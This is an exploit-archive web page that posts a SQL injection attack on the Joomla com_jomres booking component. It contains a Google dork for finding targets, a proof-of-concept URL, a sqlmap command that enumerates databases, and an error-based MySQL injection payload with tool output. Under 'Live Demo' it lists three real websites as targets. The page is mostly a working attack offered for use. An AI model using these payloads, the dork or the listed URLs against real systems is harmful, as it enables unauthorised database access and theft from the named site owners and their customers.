Home / exploits Joomla com_ jomres SQL injection Vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>Joomla com_ jomres SQL injection Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : Joomla com_ jomres SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : index.php?option=com_ jomres "property_uid" # Software link : https://www.jomres.net/files/jomres_joomla_component_installer.zip # Vendor Homepage : https://www.jomres.net # Tested on: [ Kali Linux 2.0 ] # skype:xbadgirl21 # Date: 2016/07/12 # video Proof : https://youtu.be/BjTHnDZsX_s ###################### # [+] DESCRIPTION : ###################### # [+] Jomres is the most powerful, commission-free Joomla and WordPress online booking system and property management solution # [+] used by thousands of businesses worldwide # [+] to better manage their properties, reservations, payments and increase sales # [+] and an SQL injection been Detected in this Joomla components jomres ###################### # [+] Poc : ###################### # [property_uid] Get Parameter Vulnerable To SQLi # http(s)://<host>/<joomla-path>/index.php?option=com_jomres&Itemid=103&task=ajax_comentarii&Itemid=103&property_uid=82' ###################### # [+] SQLmap Poc : ###################### # http(s)://<host>/<joomla-path>/index.php?option=com_jomres&Itemid=103&task=ajax_comentarii&Itemid=103&property_uid=82'&tmpl=kiss&lang=ro" -p property_uid --dbs # Parameter: property_uid (GET) # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause # Payload: option=com_jomres&Itemid=103&task=ajax_comentarii&Itemid=103&property_uid=82' AND (SELECT 8845 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT #(ELT(8845=8845,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- DiLY&tmpl=kiss&lang=ro # --- # [15:29:04] [INFO] the back-end DBMS is MySQL # web application technology: PHP 5.4.45, Apache # back-end DBMS: MySQL 5.0 # [15:29:04] [INFO] fetching current database ###################### # [+] Live Demo : ###################### # https://turo.ro/index.php?option=com_jomres&Itemid=103&task=ajax_comentarii&Itemid=103%27&property_uid=82%27&tmpl=kiss&lang=ro # http://www.apartamentosviella.com/index.php?option=com_jomres&Itemid=160&lang=es&task=listProperties&propertylist_layout=mapview # http://www.andorraski.be/index.php?option=com_jomres&Itemid=140&lang=nl&task=dobooking&selectedProperty=50 ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ####################### </BODY></HTML>